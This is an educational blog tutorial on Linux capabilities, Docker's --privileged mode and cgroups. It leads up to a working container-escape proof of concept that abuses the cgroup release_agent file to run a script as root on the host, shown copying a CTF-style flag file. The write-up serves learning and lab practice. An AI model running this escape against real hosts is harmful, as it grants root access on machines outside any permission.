Dive Into the Deep
Welcome to the sixth article in my technical article series! Today, we're diving into the exciting world of Docker containers. Get ready to uncover a method for exploiting privileged Docker containers. I’ll assume you’ve already got a basic grasp of the fundamental concepts of Docker, so let’s roll up our sleeves and get started!
Exploring the setcap Command
The setcap command is used in Linux to set file capabilities, which allow you to grant specific privileges to executables. Unlike traditional root permissions, file capabilities enable a more granular approach, assigning only the necessary privileges to a process. This enhances security by reducing the need to grant full root access.
For example, sudo setcap 'cap_net_bind_service=+ep' /path/to/myapp allows the executable myapp to bind to ports below 1024 without needing full root permissions.
At its core, Linux capabilities are subsets of root's privileges that the Linux kernel can grant to processes or executables. They allow permissions to be assigned granularly instead of being granted all at once.
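To make the "subset of root" idea concrete, here is a minimal sketch that treats a capability set as what it is inside the kernel: a bitmask. It reads the CapEff field from /proc and tests a single bit. The helper name has_cap is hypothetical (it is not part of libcap); the bit numbers 10 and 21 are the values of CAP_NET_BIND_SERVICE and CAP_SYS_ADMIN in linux/capability.h.

```shell
#!/bin/sh
# Sketch: test whether one capability bit is set in a hex capability mask,
# such as the CapEff value found in /proc/<pid>/status.
# has_cap is a hypothetical helper name, not part of libcap.

has_cap() {
    mask="$1"   # hex string without the 0x prefix, e.g. 00000000a80425fb
    bit="$2"    # capability number from linux/capability.h
    [ $(( (0x$mask >> $bit) & 1 )) -eq 1 ]
}

CAP_NET_BIND_SERVICE=10
CAP_SYS_ADMIN=21

# Effective capability mask of this shell (Linux only; empty elsewhere).
current_mask=$(awk '/^CapEff:/ {print $2}' "/proc/$$/status" 2>/dev/null)

if [ -n "$current_mask" ] && has_cap "$current_mask" "$CAP_SYS_ADMIN"; then
    echo "this shell holds cap_sys_admin"
else
    echo "this shell does not hold cap_sys_admin"
fi
```

For instance, has_cap 00000000a80425fb "$CAP_NET_BIND_SERVICE" succeeds while the same mask fails the CAP_SYS_ADMIN check, which is the kind of partial privilege that capabilities are designed to express.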
Exploring Docker Modes
Docker containers can operate in two distinct modes, user (normal) mode and privileged mode, each with a different level of access to and control over the host.
Figure: the two modes in action and the level of access each mode has to the host.
Container 1 runs in user (normal) mode, interacting with the OS through the Docker Engine, while Container 2 runs in privileged mode, bypassing the Docker Engine's isolation and communicating with the OS directly. Privileged containers therefore have more direct access to system resources.
Docker Access: Groups, Privileges, and the Mighty --privileged Flag!
- A normal user needs to be in the docker group to run Docker commands without sudo.
- Adding the user to the docker group allows them to execute Docker commands like docker run <image> without requiring elevated privileges.
- Command used for privileged mode: docker run --privileged -it your_image_name
- The --privileged flag grants additional capabilities to containers (e.g., hardware access, system-level features).
- In a default (rootful) installation the Docker daemon itself runs as root, so anyone who can send it commands can also pass the --privileged flag: via root or sudo, or simply as a member of the docker group.
- Membership in the docker group is therefore effectively root-equivalent on the host and should be granted sparingly.
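As a rough sketch of the first point, group membership can be checked from a shell. The helper name in_group is hypothetical; it simply scans the space-separated list that id -nG prints. Whether membership really is enough to reach the daemon depends on the socket permissions of your installation, so treat the message as an assumption about a default setup.

```shell
#!/bin/sh
# Sketch: check whether a space-separated group list (as printed by `id -nG`)
# contains a given group. in_group is a hypothetical helper name.

in_group() {
    groups_list="$1"
    wanted="$2"
    for g in $groups_list; do
        [ "$g" = "$wanted" ] && return 0
    done
    return 1
}

# Assumes the default setup where the docker group owns the daemon socket.
if in_group "$(id -nG)" docker; then
    echo "current user is in the docker group"
else
    echo "current user is not in the docker group"
fi
```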
If a container has privileged access to the operating system, it can execute commands as root on the host. Using utilities like capsh from the libcap2-bin package, we can list the container's capabilities to understand which syscalls it can make and which exploitation mechanisms are available.
The Mysteries of Syscalls
We need to understand what syscalls and cgroups are before starting the exploitation phase, so let’s begin with syscalls.
A syscall (system call) is the way programs interact with the operating system kernel. It allows user-level applications to request services such as file operations, process control, and network communication from the kernel.
Example of a Linux shell script whose command relies on system calls to list files in a directory:
#!/bin/bash
# List files in the current directory
echo "Listing files in the current directory:"
ls
This script runs the ls command, which in turn asks the kernel to open the directory and read its entries through system calls. It's a straightforward example of how user-level applications request services from the kernel.
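If you want to see those system calls for yourself, one option is strace, assuming it is installed and that tracing is permitted in your environment. The sketch below wraps it in a hypothetical helper called summarize_syscalls; the -c option asks strace for a per-syscall summary table once the traced command exits.

```shell
#!/bin/sh
# Sketch: summarize the system calls a command makes, using strace if present.
# summarize_syscalls is a hypothetical helper name.

summarize_syscalls() {
    if ! command -v strace >/dev/null 2>&1; then
        echo "strace is not installed" >&2
        return 127
    fi
    # -c prints a per-syscall count table (on stderr) when the command exits;
    # the traced command's own output is discarded.
    strace -c "$@" >/dev/null
}

# Example (run manually): summarize_syscalls ls
```

On a typical Linux system the table for ls includes calls such as openat, getdents64, and write, which are the kernel services behind "list the files in this directory".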
Demystifying cgroups
Control groups (cgroups) in Linux manage and limit the resources that processes can use. They help control CPU, memory, and other resources to ensure the system runs efficiently.
A typical control group (cgroup) directory on a Linux system, shown here in the cgroup v1 layout, might look like this:
/sys/fs/cgroup/
├── blkio
│ ├── blkio.throttle.io_serviced
│ ├── blkio.throttle.io_service_bytes
│ ├── cgroup.procs
│ ├── notify_on_release
│ ├── release_agent
│ └── tasks
├── cpu
│ ├── cgroup.procs
│ ├── cpu.cfs_period_us
│ ├── cpu.cfs_quota_us
│ ├── cpu.stat
│ ├── notify_on_release
│ ├── release_agent
│ └── tasks
├── cpuacct
│ ├── cgroup.procs
│ ├── cpuacct.usage
│ ├── cpuacct.stat
│ ├── notify_on_release
│ ├── release_agent
│ └── tasks
├── devices
│ ├── cgroup.procs
│ ├── devices.allow
│ ├── devices.deny
│ ├── notify_on_release
│ ├── release_agent
│ └── tasks
└── memory
  ├── cgroup.procs
  ├── memory.limit_in_bytes
  ├── memory.usage_in_bytes
  ├── notify_on_release
  ├── release_agent
  └── tasks
Each subsystem (blkio, cpu, cpuacct, devices, memory) represents a different resource controller and contains files that control various aspects of process resource usage within that cgroup.
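To see which cgroup a process currently belongs to for a given controller, you can read /proc/<pid>/cgroup, where each line has the form hierarchy-ID:controllers:path. The following is a minimal sketch for the cgroup v1 layout; cgroup_path_for is a hypothetical helper name, and on a pure cgroup v2 system (a single 0::/path line) it will simply print nothing.

```shell
#!/bin/sh
# Sketch: look up the cgroup path of a process for one cgroup v1 controller.
# Each line of /proc/<pid>/cgroup has the form  hierarchy-ID:controllers:path
# cgroup_path_for is a hypothetical helper name.

cgroup_path_for() {
    controller="$1"
    file="${2:-/proc/self/cgroup}"
    awk -F: -v want="$controller" '
        {
            line = $0
            n = split($2, names, ",")
            for (i = 1; i <= n; i++) {
                if (names[i] == want) {
                    # Keep everything after the second colon as the path.
                    sub(/^[^:]*:[^:]*:/, "", line)
                    print line
                    exit
                }
            }
        }' "$file" 2>/dev/null
}

echo "memory cgroup of this shell: $(cgroup_path_for memory)"
```

Inside a Docker container on a cgroup v1 host, the printed path usually contains the container ID, which is a handy hint that you are in a container at all.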
Taming the Beast By Editing cgroups
When you create a new cgroup directory, the kernel automatically populates it with control files. For example, on a cgroup v1 system, after creating the directory /sys/fs/cgroup/cpu/my_cgroup under the cpu controller, the directory will typically contain files such as the following by default:
/sys/fs/cgroup/cpu/my_cgroup
├── cgroup.procs
├── cpu.cfs_period_us
├── cpu.cfs_quota_us
├── notify_on_release
└── tasks
Note that release_agent is missing here: it exists only in the root directory of each hierarchy, not in child cgroups.
Here's an example of setting the CPU quota through the cpu.cfs_quota_us file:
mkdir /sys/fs/cgroup/cpu/my_cgroup # First, create the cgroup directory
cd /sys/fs/cgroup/cpu/my_cgroup # Change to the new directory
echo 50000 > cpu.cfs_quota_us # Allow 50 ms of CPU time...
echo 100000 > cpu.cfs_period_us # ...in every 100 ms period
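The two numbers only make sense together: the quota is how much CPU time the cgroup may use within each period. A small sketch of that arithmetic, using a hypothetical helper named cpu_limit_percent:

```shell
#!/bin/sh
# Sketch: turn a CFS quota/period pair into a percentage of one CPU.
# cpu_limit_percent is a hypothetical helper name.

cpu_limit_percent() {
    quota_us="$1"
    period_us="$2"
    # In cgroup v1 a quota of -1 means "no limit".
    if [ "$quota_us" -lt 0 ]; then
        echo "unlimited"
        return 0
    fi
    echo $(( $quota_us * 100 / $period_us ))
}

cpu_limit_percent 50000 100000   # prints 50
```

So the values above cap the cgroup at half of one CPU core; a quota larger than the period (for example 200000 with a period of 100000) would allow the equivalent of two cores.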
Now we will explain some cgroup files and how they work with specific commands:
echo 1 > /tmp/cgrp/x/notify_on_release
The notify_on_release file controls whether the kernel acts when the cgroup is released, meaning that all processes assigned to that cgroup have completed their execution or have been terminated. You write 1 to this file to enable the notification.
echo "$host_path/exploit" > /tmp/cgrp/release_agent
The release_agent file, located in the root of the mounted hierarchy, specifies a script or binary to be executed when a cgroup is released. So, when a cgroup with notify_on_release enabled becomes empty, the kernel runs the program specified in release_agent, and it does so on the host with root privileges.
Only a process added to the cgroup (echo $$ > /tmp/cgrp/x/cgroup.procs) is affected, and it will trigger the release_agent when it exits and leaves the cgroup empty.
Example of what might be written inside the cgroup.procs file:
12345
67890
11223
44556
The script targets a specific process, not all processes: only the process that you add to the cgroup will trigger the release agent upon exiting.
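The relationship between the two files can be sketched as a simple read-only check: a child cgroup is "armed" when its notify_on_release contains 1 and the hierarchy's release_agent is non-empty. The helper name release_armed is hypothetical, and the demo below uses an ordinary temporary directory as a stand-in for a real cgroup mount, so nothing is actually executed by the kernel.

```shell
#!/bin/sh
# Sketch: report whether a cgroup v1 child is set up to fire a release agent.
# release_armed is a hypothetical helper; it only reads files.

release_armed() {
    root="$1"    # root of the mounted hierarchy, e.g. /tmp/cgrp
    child="$2"   # child cgroup name, e.g. x
    flag=$(cat "$root/$child/notify_on_release" 2>/dev/null)
    agent=$(cat "$root/release_agent" 2>/dev/null)
    if [ "$flag" = "1" ] && [ -n "$agent" ]; then
        echo "armed: $agent runs when $child becomes empty"
        return 0
    fi
    echo "not armed"
    return 1
}

# Demo on a plain directory that only imitates the file layout.
demo=$(mktemp -d)
mkdir "$demo/x"
echo 1 > "$demo/x/notify_on_release"
echo "/path/on/host/exploit" > "$demo/release_agent"   # made-up path
release_armed "$demo" x
rm -rf "$demo"
```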
Checking Container Capabilities
Listing the capabilities of a privileged Docker container:
semo@privilegedcontainer:~$ capsh --print
Current: = cap_chown, cap_sys_module, cap_sys_chroot, cap_sys_admin, cap_setgid, cap_setuid
In the example exploit below, we are going to use the mount syscall (as allowed by the container's capabilities) to mount the host's control groups into the container.
cap_sys_admin: A broad capability that includes many administrative privileges, including the ability to mount and unmount filesystems.
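When scripting this check, you can search the "Current:" line of capsh --print for the capability you care about. The sketch below is one way to do that with standard tools; caps_include is a hypothetical helper name, and the sample line is the output shown above rather than live output, since the exact format varies between libcap versions.

```shell
#!/bin/sh
# Sketch: check a "Current:" line from `capsh --print` for one capability.
# caps_include is a hypothetical helper name.

caps_include() {
    line="$1"
    wanted="$2"
    # Drop the "Current: =" prefix and any trailing "+eip"-style flags,
    # split on commas and spaces, then require an exact name match.
    printf '%s\n' "$line" |
        sed -e 's/^Current:[[:space:]]*=*//' -e 's/+[eip]*$//' |
        tr ', ' '\n\n' |
        grep -qx "$wanted"
}

sample='Current: = cap_chown, cap_sys_module, cap_sys_chroot, cap_sys_admin, cap_setgid, cap_setuid'

if caps_include "$sample" cap_sys_admin; then
    echo "cap_sys_admin present: mounting filesystems may be permitted"
fi
```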
Detailed Exploitation of Privileged Containers
The code snippet below is a modified version of the Proof of Concept (PoC) created by Trail of Bits, which details the inner workings of this exploit well.
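# Mount a cgroup hierarchy and create a child cgroup named x
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Ask the kernel to run the release agent when x becomes empty
echo 1 > /tmp/cgrp/x/notify_on_release
# Find the container's writable layer on the host and register the agent
semo_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$semo_path/exploit" > /tmp/cgrp/release_agent
# Build the payload script inside the container
echo '#!/bin/sh' > /exploit
echo "cat /home/semo/flag.txt > $semo_path/flag.txt" >> /exploit
chmod a+x /exploit
# Add a short-lived process to x; its exit triggers the release agent
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"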
Exploitation Explanation
- Create a cgroup that we control in order to manage and execute our exploit. As root in the container, we mount a cgroup hierarchy at /tmp/cgrp and create a child cgroup named x inside it.
- To arm our exploit, we write 1 to /tmp/cgrp/x/notify_on_release, telling the kernel that it should execute the release agent when the cgroup finishes.
- Determine where the container's files are stored on the host and save this path as a variable.
- Write the host-side location of our /exploit script into release_agent, which the kernel will execute when the cgroup is released.
- Create a shell script for our exploit at /exploit in the container, which the host sees under the path saved earlier.
- Add a command to the script that copies the host's flag into a file named flag.txt in the container upon execution.
- Make the /exploit script executable.
- The last command spawns a short-lived sh process that writes its own process ID (PID) to the cgroup.procs file located in /tmp/cgrp/x/, which adds that process to the control group (cgroup).
- When that process exits, the cgroup becomes empty and is released, and the kernel executes the release agent, that is, our script.
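The step that finds the container's location on the host is the least obvious one, so here is a small sketch of it in isolation. Docker's overlay2 storage driver mounts the container's root filesystem with an upperdir= option that points at the writable layer on the host, and sed can pull that value out of the mount table. The helper name overlay_upperdir and the overlay2 path in the sample entry are made up for illustration.

```shell
#!/bin/sh
# Sketch: pull the overlay "upperdir" (the container's writable layer on the
# host) out of a mount table. overlay_upperdir is a hypothetical helper name.

overlay_upperdir() {
    mtab="${1:-/etc/mtab}"
    # -n suppresses default output; the p flag prints only lines that matched.
    sed -n 's/.*upperdir=\([^,]*\).*/\1/p' "$mtab" | head -n 1
}

# Illustrative mount entry; the overlay2 path below is made up.
sample=$(mktemp)
echo 'overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAA,upperdir=/var/lib/docker/overlay2/abc123/diff,workdir=/var/lib/docker/overlay2/abc123/work 0 0' > "$sample"

overlay_upperdir "$sample"   # prints /var/lib/docker/overlay2/abc123/diff
rm -f "$sample"
```

Because a file written to /exploit inside the container lands in that upper directory, the host can reach the same file at the printed path followed by /exploit, which is exactly what gets written into release_agent.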
Groovy Summary of Exploit Flow
- We write a process ID to cgroup.procs to include the process in the cgroup.
- The process runs and exits naturally, leaving cgroup.procs empty.
- The notify_on_release flag triggers the release agent when the cgroup is empty.
- release_agent runs the exploit script to perform the specified actions.
Note: if you want to practice this vulnerability, you can check out the TryHackMe Container Vulnerability Module.
Byiee
I hope you found this article both useful and insightful. If you have any related suggestions or recommendations, feel free to connect with me on LinkedIn www.linkedin.com